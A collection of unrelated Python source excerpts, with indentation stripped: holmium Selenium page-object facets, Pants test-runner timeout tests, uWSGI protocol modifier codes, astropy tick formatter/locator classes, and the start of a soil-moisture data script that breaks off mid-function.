iterate over all registered :class:`Facet` objects and validate them
:param selenium.webdriver.remote.webdriver.WebDriver driver:
the webdriver
"""
for facet in self:
try:
facet.evaluate(driver)
# pylint: disable=broad-except
except Exception as _:
if facet.debug:
log.warn(FacetError(facet, _))
elif facet.required:
raise FacetError(facet, _)
class CopyOnCreateFacetCollectionMeta(ABCMeta):
"""
makes a new copy of any :class:`FacetCollection`
instances upon creating the class. This is to ensure
that different derived classes of :class:`Page`
do not clobber the class facets of the base class.
"""
def __init__(cls, *args):
super(CopyOnCreateFacetCollectionMeta, cls).__init__(*args)
visited = {}
for superclass in cls.__mro__:
for key, value in vars(superclass).items():
if isinstance(value, (FacetCollection)):
visited.setdefault(key, FacetCollection())
for facet in value:
visited[key].append(facet)
setattr(cls, key, FacetCollection(visited[key]))
@add_metaclass(CopyOnCreateFacetCollectionMeta)
class Faceted(object):
"""
mixin for objects that want to have facets registered
on them.
"""
def __init__(self):
self.instance_facets = FacetCollection()
super(Faceted, self).__init__()
@classmethod
def get_class_facets(cls):
"""
returns the facets registered on the class (presumably
via a decorator)
"""
if not hasattr(cls, "class_facets"):
cls.class_facets = FacetCollection()
return cls.class_facets
def get_instance_facets(self):
"""
returns the facets registered on the instance
"""
return object.__getattribute__(self, "instance_facets")
def evaluate(self):
"""
evaluates all registered facets (class & instance)
"""
from .pageobject import Page
def safe_get(e):
return object.__getattribute__(self, e)
driver = Page.get_driver()
instance_facets = safe_get("get_instance_facets")()
class_facets = safe_get("get_class_facets")()
class_facets.evaluate_all(driver)
instance_facets.evaluate_all(driver)
class Defer(Facet):
"""
:param holmium.core.Page page: the page object that is expected to be
deferred to
:param function action: a callable that takes the page object instance as
the first argument
:param dict action_arguments: (optional) dictionary of arguments to pass to
`action`
:param bool debug: if True a failure to evaluate will not result in an
exception, only a log warning
:param bool required: if False a failure to evaluate will be treated as a
noop.
"""
__ARGS__ = ["page", "action"]
__OPTIONS__ = {"action_arguments": {}}
def evaluate(self, driver):
page_cls = self.arguments["page"]
page = page_cls(driver)
return self.arguments["action"](
page,
**self.options["action_arguments"]
)
class Title(Facet):
"""
enforces the title of the current page.
:param str title: a regular expression to match the title.
:param bool debug: if True a failure to evaluate will not result in an
exception, only a log warning
:param bool required: if False a failure to evaluate will be treated as
a noop.
"""
__ARGS__ = ["title"]
__ALLOW_MULTIPLE__ = False
def evaluate(self, driver):
assert_true(
re.compile(self.arguments["title"]).match(driver.title),
"title did not match %s" % self.arguments["title"]
)
class Cookie(Facet):
"""
enforces the existence (and optionally the value) of a cookie.
:param str name: name of the cookie
:param dict value: (optional) dict (or callable) to validate the value of
the cookie.
:param bool debug: if True a failure to evaluate will not result in an
exception, only a log warning
:param bool required: if False a failure to evaluate will be treated as
a noop.
"""
__ARGS__ = ["name"]
__OPTIONS__ = {"value": None}
def evaluate(self, driver):
cookie_value = driver.get_cookie(self.arguments["name"])
if cookie_value and self.options["value"]:
if callable(self.options["value"]):
assert self.options["value"](cookie_value)
else:
assert_equals(cookie_value, self.options["value"])
else:
assert_true(
cookie_value is not None,
"cookie %s does not exist" % self.arguments["name"]
)
class Strict(Facet):
"""
enforces that every element declared in the :class:`Page` or
:class:`Section` be present.
:param bool debug: if True a failure to evaluate will not result in an
exception, only a log warning
:param bool required: if False a failure to evaluate will be treated as a
noop.
"""
def evaluate(self, driver):
pass # pragma: no cover
def __call__(self, obj):
from .pageobject import ElementGetter
for element in inspect.getmembers(obj):
if isinstance(element[1], ElementGetter):
element[1].is_facet = True
element[1].is_debug_facet = self.debug
return obj
class ElementFacet(Facet):
"""
utility trait used when validating an
:class:`holmium.core.pageobject.ElementGetter` subclass
"""
def __init__(self, element, element_name, **kwargs):
self.element_name = element_name
self.element = element
super(ElementFacet, self).__init__(required=True, **kwargs)
def evaluate(self, driver):
assert_true(
self.element.__get__(self.parent_class, self.parent_class),
"No such element"
)
def get_name(self):
return self.element_name
# pylint: disable=invalid-name
cookie = Cookie
strict = Strict
defer = Defer
title = Title
| |
# coding=utf-8
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import collections
from mock import patch
from pants.base.exceptions import TestFailedTaskError
from pants.task.task import TaskBase
from pants.task.testrunner_task_mixin import TestRunnerTaskMixin
from pants.util.process_handler import ProcessHandler
from pants.util.timeout import TimeoutReached
from pants_test.tasks.task_test_base import TaskTestBase
class DummyTestTarget(object):
def __init__(self, name, timeout=None):
self.name = name
self.timeout = timeout
self.address = collections.namedtuple('address', ['spec'])(name)
targetA = DummyTestTarget('TargetA')
targetB = DummyTestTarget('TargetB', timeout=1)
targetC = DummyTestTarget('TargetC', timeout=10)
class TestRunnerTaskMixinTest(TaskTestBase):
@classmethod
def task_type(cls):
class TestRunnerTaskMixinTask(TestRunnerTaskMixin, TaskBase):
call_list = []
def _execute(self, all_targets):
self.call_list.append(['_execute', all_targets])
self._spawn_and_wait()
def _spawn(self, *args, **kwargs):
self.call_list.append(['_spawn', args, kwargs])
class FakeProcessHandler(ProcessHandler):
def wait(_):
self.call_list.append(['process_handler.wait'])
return 0
def kill(_):
self.call_list.append(['process_handler.kill'])
def terminate(_):
self.call_list.append(['process_handler.terminate'])
def poll(_):
self.call_list.append(['process_handler.poll'])
return FakeProcessHandler()
def _get_targets(self):
return [targetA, targetB]
def _test_target_filter(self):
def target_filter(target):
self.call_list.append(['target_filter', target])
if target.name == 'TargetA':
return False
else:
return True
return target_filter
def _validate_target(self, target):
self.call_list.append(['_validate_target', target])
return TestRunnerTaskMixinTask
def test_execute_normal(self):
task = self.create_task(self.context())
task.execute()
# Confirm that everything ran as expected
self.assertIn(['target_filter', targetA], task.call_list)
self.assertIn(['target_filter', targetB], task.call_list)
self.assertIn(['_validate_target', targetB], task.call_list)
self.assertIn(['_execute', [targetA, targetB]], task.call_list)
def test_execute_skip(self):
# Set the skip option
self.set_options(skip=True)
task = self.create_task(self.context())
task.execute()
# Ensure nothing got called
self.assertListEqual(task.call_list, [])
def test_get_timeouts_no_default(self):
"""If there is no default and one of the targets has no timeout, then there is no timeout for the entire run."""
self.set_options(timeouts=True, timeout_default=None)
task = self.create_task(self.context())
self.assertIsNone(task._timeout_for_targets([targetA, targetB]))
def test_get_timeouts_disabled(self):
"""If timeouts are disabled, there is no timeout for the entire run."""
self.set_options(timeouts=False, timeout_default=2)
task = self.create_task(self.context())
self.assertIsNone(task._timeout_for_targets([targetA, targetB]))
def test_get_timeouts_with_default(self):
"""If there is a default timeout, use that for targets which have no timeout set."""
self.set_options(timeouts=True, timeout_default=2)
task = self.create_task(self.context())
self.assertEquals(task._timeout_for_targets([targetA, targetB]), 3)
def test_get_timeouts_with_maximum(self):
"""If a timeout exceeds the maximum, set it to that."""
self.set_options(timeouts=True, timeout_maximum=1)
task = self.create_task(self.context())
self.assertEquals(task._timeout_for_targets([targetC]), 1)
def test_default_maximum_conflict(self):
"""If the default exceeds the maximum, throw an error."""
self.set_options(timeouts=True, timeout_maximum=1, timeout_default=10)
task = self.create_task(self.context())
with self.assertRaises(TestFailedTaskError):
task.execute()
class TestRunnerTaskMixinSimpleTimeoutTest(TaskTestBase):
@classmethod
def task_type(cls):
class TestRunnerTaskMixinTask(TestRunnerTaskMixin, TaskBase):
call_list = []
def _execute(self, all_targets):
self.call_list.append(['_execute', all_targets])
self._spawn_and_wait()
def _spawn(self, *args, **kwargs):
self.call_list.append(['_spawn', args, kwargs])
class FakeProcessHandler(ProcessHandler):
def wait(_):
self.call_list.append(['process_handler.wait'])
return 0
def kill(_):
self.call_list.append(['process_handler.kill'])
def terminate(_):
self.call_list.append(['process_handler.terminate'])
def poll(_):
self.call_list.append(['process_handler.poll'])
return 0
return FakeProcessHandler()
def _get_targets(self):
return [targetB]
def _test_target_filter(self):
def target_filter(target):
return True
return target_filter
def _validate_target(self, target):
self.call_list.append(['_validate_target', target])
return TestRunnerTaskMixinTask
def test_timeout(self):
self.set_options(timeouts=True)
task = self.create_task(self.context())
with patch('pants.task.testrunner_task_mixin.Timeout') as mock_timeout:
mock_timeout().__exit__.side_effect = TimeoutReached(1)
with self.assertRaises(TestFailedTaskError):
task.execute()
# Ensures that Timeout is instantiated with a 1 second timeout.
args, kwargs = mock_timeout.call_args
self.assertEqual(args, (1,))
def test_timeout_disabled(self):
self.set_options(timeouts=False)
task = self.create_task(self.context())
with patch('pants.task.testrunner_task_mixin.Timeout') as mock_timeout:
task.execute()
# Ensures that Timeout is instantiated with no timeout.
args, kwargs = mock_timeout.call_args
self.assertEqual(args, (None,))
class TestRunnerTaskMixinGracefulTimeoutTest(TaskTestBase):
def create_process_handler(self, return_none_first=True):
class FakeProcessHandler(ProcessHandler):
call_list = []
poll_called = False
def wait(self):
self.call_list.append(['process_handler.wait'])
return 0
def kill(self):
self.call_list.append(['process_handler.kill'])
def terminate(self):
self.call_list.append(['process_handler.terminate'])
def poll(self):
print("poll called")
self.call_list.append(['process_handler.poll'])
if not self.poll_called and return_none_first:
self.poll_called = True
return None
else:
return 0
return FakeProcessHandler()
def task_type(cls):
class TestRunnerTaskMixinTask(TestRunnerTaskMixin, TaskBase):
call_list = []
def _execute(self, all_targets):
self.call_list.append(['_execute', all_targets])
self._spawn_and_wait()
def _spawn(self, *args, **kwargs):
self.call_list.append(['_spawn', args, kwargs])
return cls.process_handler
def _get_targets(self):
return [targetA, targetB]
def _test_target_filter(self):
def target_filter(target):
self.call_list.append(['target_filter', target])
if target.name == 'TargetA':
return False
else:
return True
return target_filter
def _validate_target(self, target):
self.call_list.append(['_validate_target', target])
return TestRunnerTaskMixinTask
def test_graceful_terminate_if_poll_is_none(self):
self.process_handler = self.create_process_handler(return_none_first=True)
self.set_options(timeouts=True)
task = self.create_task(self.context())
with patch('pants.task.testrunner_task_mixin.Timer') as mock_timer:
def set_handler(dummy, handler):
mock_timer_instance = mock_timer.return_value
mock_timer_instance.start.side_effect = handler
return mock_timer_instance
mock_timer.side_effect = set_handler
with self.assertRaises(TestFailedTaskError):
task.execute()
# Ensure that all the calls we want to kill the process gracefully are made.
self.assertEqual(self.process_handler.call_list,
[[u'process_handler.terminate'], [u'process_handler.poll'], [u'process_handler.kill'], [u'process_handler.wait']])
def test_graceful_terminate_if_poll_is_zero(self):
self.process_handler = self.create_process_handler(return_none_first=False)
self.set_options(timeouts=True)
task = self.create_task(self.context())
with patch('pants.task.testrunner_task_mixin.Timer') as mock_timer:
def set_handler(dummy, handler):
mock_timer_instance = mock_timer.return_value
mock_timer_instance.start.side_effect = handler
return mock_timer_instance
mock_timer.side_effect = set_handler
with self.assertRaises(TestFailedTaskError):
task.execute()
# Ensure that we only call terminate, and not kill.
self.assertEqual(self.process_handler.call_list,
[[u'process_handler.terminate'], [u'process_handler.poll'], [u'process_handler.wait']])
| |
from ..exceptions import ConfigurationError
RANGE_255 = list(range(256))
class Modifier:
_submod = None
subcodes = None
code = None
submod = property()
def __init__(self, submod=None):
self.submod = submod
@classmethod
def _get_code_str(cls, src) -> str:
"""
:param src:
"""
return str(src) if src is not None else ''
def __str__(self):
return self._get_code_str(self.code)
@submod.getter
def submod(self) -> str:
"""Modifier 2 value."""
return self._get_code_str(self._submod)
@submod.setter
def submod(self, val):
allowed = self.subcodes
if val is not None and (allowed is not None and val not in allowed):
raise ConfigurationError(
f'Unsupported submod (modifier2) value `{val}` '
f'for {self.__class__.__name__} (modifier1) `{self.code}`')
self._submod = val
class ModifierWsgi(Modifier):
"""Standard WSGI request followed by the HTTP request body."""
subcodes = [0]
code = 0
class ModifierPsgi(Modifier):
"""Standard PSGI request followed by the HTTP request body."""
subcodes = [0]
code = 5
class ModifierLua(Modifier):
"""Standard LUA/WSAPI request followed by the HTTP request body."""
subcodes = [0]
code = 6
class ModifierRack(Modifier):
"""Standard RACK request followed by the HTTP request body."""
subcodes = [0]
code = 7
class ModifierJvm(Modifier):
"""Standard JVM request for The JWSGI interface and
The Clojure/Ring JVM request handler followed by the HTTP request body.
"""
SUB_RING = 1
"""Use Clojure/Ring JVM request handler."""
subcodes = [0, SUB_RING]
code = 8
class ModifierCgi(Modifier):
"""Standard Running CGI scripts on uWSGI request followed by the HTTP request body."""
subcodes = [0]
code = 9
class ModifierManage(Modifier):
"""Management interface request: setup flag specified by ``modifier2``.
For a list of management flag look at ``ManagementFlag``.
"""
subcodes = RANGE_255
code = 10
class ModifierGccgo(Modifier):
code = 11
class ModifierPhp(Modifier):
"""Standard Running PHP scripts in uWSGI request followed by the HTTP request body."""
subcodes = [0]
code = 14
class ModifierMono(Modifier):
"""Standard The Mono ASP.NET plugin request followed by the HTTP request body."""
subcodes = [0]
code = 15
class ModifierSpooler(Modifier):
"""The uWSGI Spooler request, the block vars is converted
to a dictionary/hash/table and passed to the spooler callable.
"""
subcodes = RANGE_255
code = 17
class ModifierSymcall(Modifier):
"""Direct call to C-like symbols."""
subcodes = RANGE_255
code = 18
class ModifierSsi(Modifier):
code = 19
class ModifierEval(Modifier):
"""Raw Code evaluation. The interpreter is chosen by the ``modifier2``.
..note:: It does not return a valid uwsgi response, but a raw string (that may be an HTTP response).
"""
SUB_PYTHON = 0
SUB_PERL = 5
subcodes = [SUB_PYTHON, SUB_PERL]
code = 22
class ModifierXslt(Modifier):
"""Invoke the The XSLT plugin."""
subcodes = RANGE_255
code = 23
class ModifierV8(Modifier):
"""Invoke the uWSGI V8 support."""
subcodes = RANGE_255
code = 24
class ModifierGridfs(Modifier):
"""Invoke the The GridFS plugin."""
subcodes = RANGE_255
code = 25
class ModifierFastfunc(Modifier):
"""Call the FastFuncs specified by the ``modifier2`` field."""
subcodes = RANGE_255
code = 26
class ModifierGlusterfs(Modifier):
"""Invoke the The GlusterFS plugin."""
subcodes = RANGE_255
code = 27
class ModifierRados(Modifier):
"""Invoke the The RADOS plugin."""
subcodes = RANGE_255
code = 28
class ModifierManagePathInfo(Modifier):
"""Standard WSGI request followed by the HTTP request body.
The ``PATH_INFO`` is automatically modified, removing the ``SCRIPT_NAME`` from it.
"""
code = 30
class ModifierMessage(Modifier):
"""Generic message passing (reserved)."""
subcodes = RANGE_255
code = 31
class ModifierMessageArray(Modifier):
"""Array of char passing (reserved)."""
subcodes = RANGE_255
code = 32
class ModifierMessageMarshal(Modifier):
"""Marshalled/serialzed object passing (reserved)."""
subcodes = RANGE_255
code = 33
class ModifierWebdav(Modifier):
code = 35
class ModifierSnmp(Modifier):
"""Identify a SNMP request/response (mainly via UDP)."""
code = 48
class ModifierRaw(Modifier):
"""Corresponds to the ``HTTP`` string and signals that
this is a raw HTTP response.
"""
code = 72
class ModifierMulticastAnnounce(Modifier):
"""Announce message."""
code = 73
class ModifierMulticast(Modifier):
"""Array of chars; a custom multicast message managed by uwsgi."""
subcodes = [0]
code = 74
class ModifierClusterNode(Modifier):
"""Add/remove/enable/disable node from a cluster.
Add action requires a dict of at least 3 keys:
* hostname
* address
* workers
"""
SUB_ADD = 0
SUB_REMOVE = 1
SUB_ENABLE = 2
SUB_DISABLE = 3
subcodes = [
SUB_ADD,
SUB_REMOVE,
SUB_ENABLE,
SUB_DISABLE,
]
code = 95
class ModifierRemoteLogging(Modifier):
"""Remote logging (clustering/multicast/unicast)."""
subcodes = [0]
code = 96
class ModifierReload(Modifier):
"""Graceful reload request."""
SUB_REQUEST = 0
SUB_CONFIRMATION = 1
subcodes = [SUB_REQUEST, SUB_CONFIRMATION]
code = 98
class ModifierReloadBrutal(ModifierReload):
"""Brutal reload request."""
code = 97
class ModifierConfigFromNode(Modifier):
"""Request configuration data from a uwsgi node (even via multicast)."""
subcodes = [0, 1]
code = 99
class ModifierPing(Modifier):
"""PING-PONG. Useful for cluster health check."""
SUB_PING = 0
"""Request."""
SUB_PONG = 1
"""Response."""
subcodes = [SUB_PING, SUB_PONG]
code = 100
class ModifierEcho(Modifier):
"""ECHO service."""
subcodes = [0]
code = 101
class ModifierLegionMsg(Modifier):
"""Legion msg (UDP, the body is encrypted)."""
subcodes = RANGE_255
code = 109
class ModifierSignal(Modifier):
"""uwsgi_signal framework (payload is optional).
.. note:: ``modifier2`` is the signal num.
"""
subcodes = RANGE_255
code = 110
class ModifierCache(Modifier):
"""Cache operations."""
SUB_GET = 0
"""Simple cache get for values not bigger than 64k."""
SUB_SET = 1
"""Simple cache set for values not bigger than 64k."""
SUB_DELETE = 2
"""Simple cache del."""
SUB_DICT_BASED = 3
"""Simple dict based get command."""
SUB_STREAM = 5
"""Get and stream."""
SUB_DUMP = 6
"""Dump the whole cache."""
SUB_MAGIC = 17
"""Magic interface for plugins remote access."""
subcodes = [
SUB_GET,
SUB_SET,
SUB_DELETE,
SUB_DICT_BASED,
SUB_STREAM,
SUB_DUMP,
SUB_MAGIC,
]
code = 111
class ModifierCorerouterSignal(Modifier):
"""Special modifier for signaling corerouters about special conditions."""
code = 123
class ModifierRpc(Modifier):
"""RPC. The packet is an uwsgi array where
* the first item - the name of the function
* the following - the args
"""
SUB_DEFAULT = 0
"""Return uwsgi header + rpc response."""
SUB_RAW = 1
"""Return raw rpc response, uwsgi header included, if available."""
SUB_USE_PATH_INFO = 2
"""Split PATH_INFO to get func name and args and return as HTTP response
with content_type as application/binary or Accept request header (if different from *).
"""
SUB_XMLRPC = 3
"""Set xmlrpc wrapper (requires libxml2)."""
SUB_JSONRPC = 4
"""Set jsonrpc wrapper (requires libjansson)."""
SUB_DICT = 5
"""Used in uwsgi response to signal the response is a uwsgi dictionary
followed by the body (the dictionary must contains a CONTENT_LENGTH key).
"""
subcodes = [
SUB_DEFAULT,
SUB_RAW,
SUB_USE_PATH_INFO,
SUB_XMLRPC,
SUB_JSONRPC,
SUB_DICT,
]
code = 173
class ModifierPersistentClose(Modifier):
"""Close mark for persistent connections."""
subcodes = [0]
code = 200
class ModifierSubscription(Modifier):
"""Subscription packet. See ``subscriptions``."""
subcodes = [0]
code = 224
class ModifierExample(Modifier):
"""Modifier used in dummy example plugin."""
code = 250
class ModifierResponse(Modifier):
"""Generic response. Request dependent.
Example: a spooler response set 0 for a failed spool or 1 for a successful one.
"""
subcodes = RANGE_255
code = 255
| |
# Licensed under a 3-clause BSD style license - see LICENSE.rst
# This file defines the AngleFormatterLocator class which is a class that
# provides both a method for a formatter and one for a locator, for a given
# label spacing. The advantage of keeping the two connected is that we need to
# make sure that the formatter can correctly represent the spacing requested and
# vice versa. For example, a format of dd:mm cannot work with a tick spacing
# that is not a multiple of one arcminute.
import re
import warnings
import numpy as np
from matplotlib import rcParams
from ... import units as u
from ...units import UnitsError
from ...coordinates import Angle
DMS_RE = re.compile('^dd(:mm(:ss(.(s)+)?)?)?$')
HMS_RE = re.compile('^hh(:mm(:ss(.(s)+)?)?)?$')
DDEC_RE = re.compile('^d(.(d)+)?$')
DMIN_RE = re.compile('^m(.(m)+)?$')
DSEC_RE = re.compile('^s(.(s)+)?$')
SCAL_RE = re.compile('^x(.(x)+)?$')
class BaseFormatterLocator:
"""
A joint formatter/locator
"""
def __init__(self, values=None, number=None, spacing=None, format=None):
if (values, number, spacing).count(None) < 2:
raise ValueError("At most one of values/number/spacing can be specifed")
if values is not None:
self.values = values
elif number is not None:
self.number = number
elif spacing is not None:
self.spacing = spacing
else:
self.number = 5
self.format = format
@property
def values(self):
return self._values
@values.setter
def values(self, values):
if not isinstance(values, u.Quantity) or (not values.ndim == 1):
raise TypeError("values should be an astropy.units.Quantity array")
if not values.unit.is_equivalent(self._unit):
raise UnitsError("value should be in units compatible with "
"coordinate units ({0}) but found {1}".format(self._unit, values.unit))
self._number = None
self._spacing = None
self._values = values
@property
def number(self):
return self._number
@number.setter
def number(self, number):
self._number = number
self._spacing = None
self._values = None
@property
def spacing(self):
return self._spacing
@spacing.setter
def spacing(self, spacing):
self._number = None
self._spacing = spacing
self._values = None
def minor_locator(self, spacing, frequency, value_min, value_max):
if self.values is not None:
return [] * self._unit
minor_spacing = spacing.value / frequency
values = self._locate_values(value_min, value_max, minor_spacing)
index = np.where((values % frequency) == 0)
index = index[0][0]
values = np.delete(values, np.s_[index::frequency])
return values * minor_spacing * self._unit
@property
def format_unit(self):
return self._format_unit
@format_unit.setter
def format_unit(self, unit):
self._format_unit = u.Unit(unit)
@staticmethod
def _locate_values(value_min, value_max, spacing):
imin = np.ceil(value_min / spacing)
imax = np.floor(value_max / spacing)
values = np.arange(imin, imax + 1, dtype=int)
return values
class AngleFormatterLocator(BaseFormatterLocator):
"""
A joint formatter/locator
"""
def __init__(self, values=None, number=None, spacing=None, format=None,
unit=None, decimal=None, format_unit=None):
if unit is None:
unit = u.degree
if format_unit is None:
format_unit = unit
if format_unit not in (u.degree, u.hourangle, u.hour):
if decimal is None:
decimal = True
elif decimal is False:
raise UnitsError("Units should be degrees or hours when using non-decimal (sexagesimal) mode")
elif decimal is None:
decimal = False
self._unit = unit
self._format_unit = format_unit or unit
self._decimal = decimal
self._sep = None
super().__init__(values=values, number=number, spacing=spacing,
format=format)
@property
def spacing(self):
return self._spacing
@spacing.setter
def spacing(self, spacing):
if spacing is not None and (not isinstance(spacing, u.Quantity) or
spacing.unit.physical_type != 'angle'):
raise TypeError("spacing should be an astropy.units.Quantity "
"instance with units of angle")
self._number = None
self._spacing = spacing
self._values = None
@property
def sep(self):
return self._sep
@sep.setter
def sep(self, separator):
self._sep = separator
@property
def format(self):
return self._format
@format.setter
def format(self, value):
self._format = value
if value is None:
return
if DMS_RE.match(value) is not None:
self._decimal = False
self._format_unit = u.degree
if '.' in value:
self._precision = len(value) - value.index('.') - 1
self._fields = 3
else:
self._precision = 0
self._fields = value.count(':') + 1
elif HMS_RE.match(value) is not None:
self._decimal = False
self._format_unit = u.hourangle
if '.' in value:
self._precision = len(value) - value.index('.') - 1
self._fields = 3
else:
self._precision = 0
self._fields = value.count(':') + 1
elif DDEC_RE.match(value) is not None:
self._decimal = True
self._format_unit = u.degree
self._fields = 1
if '.' in value:
self._precision = len(value) - value.index('.') - 1
else:
self._precision = 0
elif DMIN_RE.match(value) is not None:
self._decimal = True
self._format_unit = u.arcmin
self._fields = 1
if '.' in value:
self._precision = len(value) - value.index('.') - 1
else:
self._precision = 0
elif DSEC_RE.match(value) is not None:
self._decimal = True
self._format_unit = u.arcsec
self._fields = 1
if '.' in value:
self._precision = len(value) - value.index('.') - 1
else:
self._precision = 0
else:
raise ValueError("Invalid format: {0}".format(value))
if self.spacing is not None and self.spacing < self.base_spacing:
warnings.warn("Spacing is too small - resetting spacing to match format")
self.spacing = self.base_spacing
if self.spacing is not None:
ratio = (self.spacing / self.base_spacing).decompose().value
remainder = ratio - np.round(ratio)
if abs(remainder) > 1.e-10:
warnings.warn("Spacing is not a multiple of base spacing - resetting spacing to match format")
self.spacing = self.base_spacing * max(1, round(ratio))
@property
def base_spacing(self):
if self._decimal:
spacing = self._format_unit / (10. ** self._precision)
else:
if self._fields == 1:
spacing = 1. * u.degree
elif self._fields == 2:
spacing = 1. * u.arcmin
elif self._fields == 3:
if self._precision == 0:
spacing = 1. * u.arcsec
else:
spacing = u.arcsec / (10. ** self._precision)
if self._format_unit is u.hourangle:
spacing *= 15
return spacing
def locator(self, value_min, value_max):
if self.values is not None:
# values were manually specified
return self.values, 1.1 * u.arcsec
else:
# In the special case where value_min is the same as value_max, we
# don't locate any ticks. This can occur for example when taking a
# slice for a cube (along the dimension sliced).
if value_min == value_max:
return [] * self._unit, 0 * self._unit
if self.spacing is not None:
# spacing was manually specified
spacing_value = self.spacing.to_value(self._unit)
elif self.number is not None:
# number of ticks was specified, work out optimal spacing
# first compute the exact spacing
dv = abs(float(value_max - value_min)) / self.number * self._unit
if self.format is not None and dv < self.base_spacing:
# if the spacing is less than the minimum spacing allowed by the format, simply
# use the format precision instead.
spacing_value = self.base_spacing.to_value(self._unit)
else:
# otherwise we clip to the nearest 'sensible' spacing
if self._decimal:
from .utils import select_step_scalar
spacing_value = select_step_scalar(dv.to_value(self._format_unit)) * self._format_unit.to(self._unit)
else:
if self._format_unit is u.degree:
from .utils import select_step_degree
spacing_value = select_step_degree(dv).to_value(self._unit)
else:
from .utils import select_step_hour
spacing_value = select_step_hour(dv).to_value(self._unit)
# We now find the interval values as multiples of the spacing and
# generate the tick positions from this.
values = self._locate_values(value_min, value_max, spacing_value)
return values * spacing_value * self._unit, spacing_value * self._unit
def formatter(self, values, spacing, format='auto'):
if not isinstance(values, u.Quantity) and values is not None:
raise TypeError("values should be a Quantities array")
if len(values) > 0:
decimal = self._decimal
unit = self._format_unit
if self.format is None:
if decimal:
# Here we assume the spacing can be arbitrary, so for example
# 1.000223 degrees, in which case we don't want to have a
# format that rounds to degrees. So we find the number of
# decimal places we get from representing the spacing as a
# string in the desired units. The easiest way to find
# the smallest number of decimal places required is to
# format the number as a decimal float and strip any zeros
# from the end. We do this rather than just trusting e.g.
# str() because str(15.) == 15.0. We format using 10 decimal
# places by default before stripping the zeros since this
# corresponds to a resolution of less than a microarcecond,
# which should be sufficient.
spacing = spacing.to_value(unit)
fields = 0
precision = len("{0:.10f}".format(spacing).replace('0', ' ').strip().split('.', 1)[1])
else:
spacing = spacing.to_value(unit / 3600)
if spacing >= 3600:
fields = 1
precision = 0
elif spacing >= 60:
fields = 2
precision = 0
elif spacing >= 1:
fields = 3
precision = 0
else:
fields = 3
precision = -int(np.floor(np.log10(spacing)))
else:
fields = self._fields
precision = self._precision
if decimal:
sep = None
fmt = None
elif self._sep is not None:
sep = self._sep
fmt = None
else:
sep = 'fromunit'
if unit == u.degree:
if format == 'latex' or (format == 'auto' and rcParams['text.usetex']):
fmt = 'latex'
else:
sep = ('\xb0', "'", '"')
fmt = None
else:
if format == 'ascii':
fmt = None
elif format == 'latex' or (format == 'auto' and rcParams['text.usetex']):
fmt = 'latex'
else:
# Here we still use LaTeX but this is for Matplotlib's
# LaTeX engine - we can't use fmt='latex' as this
# doesn't produce LaTeX output that respects the fonts.
sep = (r'$\mathregular{^h}$', r'$\mathregular{^m}$', r'$\mathregular{^s}$')
fmt = None
angles = Angle(values)
string = angles.to_string(unit=unit,
precision=precision,
decimal=decimal,
fields=fields,
sep=sep,
format=fmt).tolist()
return string
else:
return []
class ScalarFormatterLocator(BaseFormatterLocator):
"""
A joint formatter/locator
"""
def __init__(self, values=None, number=None, spacing=None, format=None,
unit=None, format_unit=None):
if unit is not None:
self._unit = unit
self._format_unit = format_unit or unit
elif spacing is not None:
self._unit = spacing.unit
self._format_unit = format_unit or spacing.unit
elif values is not None:
self._unit = values.unit
self._format_unit = format_unit or values.unit
super().__init__(values=values, number=number, spacing=spacing,
format=format)
@property
def spacing(self):
return self._spacing
@spacing.setter
def spacing(self, spacing):
if spacing is not None and not isinstance(spacing, u.Quantity):
raise TypeError("spacing should be an astropy.units.Quantity instance")
self._number = None
self._spacing = spacing
self._values = None
@property
def format(self):
return self._format
@format.setter
def format(self, value):
self._format = value
if value is None:
return
if SCAL_RE.match(value) is not None:
if '.' in value:
self._precision = len(value) - value.index('.') - 1
else:
self._precision = 0
if self.spacing is not None and self.spacing < self.base_spacing:
warnings.warn("Spacing is too small - resetting spacing to match format")
self.spacing = self.base_spacing
if self.spacing is not None:
ratio = (self.spacing / self.base_spacing).decompose().value
remainder = ratio - np.round(ratio)
if abs(remainder) > 1.e-10:
warnings.warn("Spacing is not a multiple of base spacing - resetting spacing to match format")
self.spacing = self.base_spacing * max(1, round(ratio))
elif not value.startswith('%'):
raise ValueError("Invalid format: {0}".format(value))
@property
def base_spacing(self):
return self._format_unit / (10. ** self._precision)
def locator(self, value_min, value_max):
if self.values is not None:
# values were manually specified
return self.values, 1.1 * self._unit
else:
# In the special case where value_min is the same as value_max, we
# don't locate any ticks. This can occur for example when taking a
# slice for a cube (along the dimension sliced).
if value_min == value_max:
return [] * self._unit, 0 * self._unit
if self.spacing is not None:
# spacing was manually specified
spacing = self.spacing.to_value(self._unit)
elif self.number is not None:
# number of ticks was specified, work out optimal spacing
# first compute the exact spacing
dv = abs(float(value_max - value_min)) / self.number * self._unit
if self.format is not None and (not self.format.startswith('%')) and dv < self.base_spacing:
# if the spacing is less than the minimum spacing allowed by the format, simply
# use the format precision instead.
spacing = self.base_spacing.to_value(self._unit)
else:
from .utils import select_step_scalar
spacing = select_step_scalar(dv.to_value(self._format_unit)) * self._format_unit.to(self._unit)
# We now find the interval values as multiples of the spacing and
# generate the tick positions from this
values = self._locate_values(value_min, value_max, spacing)
return values * spacing * self._unit, spacing * self._unit
def formatter(self, values, spacing, format='auto'):
if len(values) > 0:
if self.format is None:
if spacing.value < 1.:
precision = -int(np.floor(np.log10(spacing.value)))
else:
precision = 0
elif self.format.startswith('%'):
return [(self.format % x.value) for x in values]
else:
precision = self._precision
return [("{0:." + str(precision) + "f}").format(x.to_value(self._format_unit)) for x in values]
else:
return []
| |
# ===============================================================================
# Copyright 2016 gabe-parrish
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= standard library imports ========================
import os
import os
import pandas as pd
import numpy as np
import datetime
from matplotlib import pyplot as plt
# ============= local library imports ===========================
def intersect(l1, l2):
intersection = l1 & l2
return intersection
def formatter(df_dict):
"""
:param df_dict: a dict of data frames with the keys from '000' to '012', 13 keys total
:return:
"""
for key, value in df_dict.iteritems():
print "key \n {}".format(key)
good_dates = []
values = []
good_dfs = []
good_vals = []
for df in value:
date = df['date'] #pd.to_datetime(df['date'])
j_30 = df['swc_30cm']
